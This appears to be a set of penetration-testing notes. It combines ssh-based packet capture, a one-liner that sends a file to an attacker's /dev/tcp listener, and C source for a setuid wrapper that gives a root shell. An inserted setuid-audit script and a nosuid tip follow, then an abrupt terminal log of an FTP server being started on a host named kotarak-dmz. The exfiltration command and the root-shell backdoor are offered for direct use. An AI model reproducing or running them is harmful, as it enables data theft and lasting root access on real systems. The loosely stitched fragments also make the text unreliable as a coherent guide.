ssh <user>@<target> "/bin/tcpdump -i <interface> -nnU -s0 -w <pcap.pcap> '<BPF filter>'"
ssh <user>@<target> "/bin/tcpdump -i <interface> -nnU -s0 -w - '<BPF filter>'" | wireshark -k -i -
cat <file> > /dev/tcp/<attacker>/<attacker_port>
ncat -nlvp <attacker_port> > <file>
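If you find you can run commands as root, you can compile a setuid bash wrapper for yourself. First create a C
program:
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

int main(void)
{
    /* switch to root's UID and GID, then start a shell */
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}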
gcc setuid.c -o <outputfile>
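On the defensive side, what this technique leaves behind is a setuid file that the system's known-good set does not contain. The audit below is an added example, not part of the original notes; the function names `audit_setuid` and `demo_audit`, the baseline file format (one absolute path per line) and the scratch files are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original notes): flag setuid files that are
# not listed in a known-good baseline. Assumption: the baseline is a text
# file with one absolute path per line, e.g. generated right after install.

# audit_setuid <baseline-file> <dir>...
# Prints one "UNEXPECTED ..." line per setuid regular file missing from the
# baseline. Returns 0 if clean, 1 if anything was flagged, 2 on bad input.
audit_setuid() {
    baseline=$1
    shift
    [ -r "$baseline" ] && [ "$#" -gt 0 ] || { echo "usage: audit_setuid <baseline> <dir>..." >&2; return 2; }
    flagged=0
    # -xdev stays on one filesystem; -perm -4000 matches the setuid bit.
    list=$(find "$@" -xdev -type f -perm -4000 2>/dev/null) || true
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        # -F fixed string, -x whole line: no regex or substring surprises.
        if ! grep -Fxq -- "$path" "$baseline"; then
            echo "UNEXPECTED $(ls -ld -- "$path")"
            flagged=1
        fi
    done <<EOF
$list
EOF
    return "$flagged"
}

# Constructed sample: a scratch directory with two setuid files, only one
# of which is in the baseline. Prints the audit output for that directory.
demo_audit() {
    dir=$(mktemp -d) || return 2
    : > "$dir/known" && : > "$dir/planted" && : > "$dir/plain"
    chmod 4755 "$dir/known" "$dir/planted"
    chmod 0755 "$dir/plain"
    printf '%s\n' "$dir/known" > "$dir/baseline.txt"
    status=0
    audit_setuid "$dir/baseline.txt" "$dir" || status=$?
    rm -rf "$dir"
    return "$status"
}
```

Mounting world-writable locations such as /tmp with the nosuid option makes the kernel ignore the setuid bit on files stored there.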
atanas@kotarak-dmz:/tmp/ftptest$ python -m pyftpdlib -p21 -w
/usr/local/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:243: RuntimeWarning: write permissions assigned to anonymous user.
RuntimeWarning)
Traceback (most recent call last):
File "/usr/lib/python2.7/runpy.py", line 174, in _run_module_as_main
"__main__", fname, loader, pkg_name)
File "/usr/lib/python2.7/runpy.py", line 72, in _run_code
exec code in run_globals
File "/usr/local/lib/python2.7/dist-packages/pyftpdlib/__main__.py", line 100, in <module>
main()
File "/usr/local/lib/python2.7/dist-packages/pyftpdlib/__main__.py", line 92, in main
ftpd = FTPServer((options.interface, options.port), FTPHandler)
File "/usr/local/lib/python2.7/dist-packages/pyftpdlib/servers.py", line 114, in __init__
self.bind_af_unspecified(address_or_socket)
File "/usr/local/lib/python2.7/dist-packages/pyftpdlib/ioloop.py", line 1018, in bind_af_unspecified
raise socket.error(err)
socket.error: [Errno 13] Permission denied
atanas@kotarak-dmz:/tmp/ftptest$ authbind python -m pyftpdlib -p21 -w
/usr/local/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:243: RuntimeWarning: write permissions assigned to anonymous user.
RuntimeWarning)
[I 2020-02-16 09:36:21] >>> starting FTP server on 0.0.0.0:21, pid=25040 <<<